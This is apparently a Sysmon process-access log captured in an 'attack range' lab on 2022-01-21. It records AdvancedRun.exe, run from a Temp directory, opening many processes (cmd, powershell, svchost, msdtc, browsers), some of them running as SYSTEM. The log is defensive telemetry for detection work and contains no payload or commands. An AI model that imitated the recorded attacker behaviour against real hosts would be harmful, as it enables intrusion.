19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.242{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.242{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.235{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.233{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
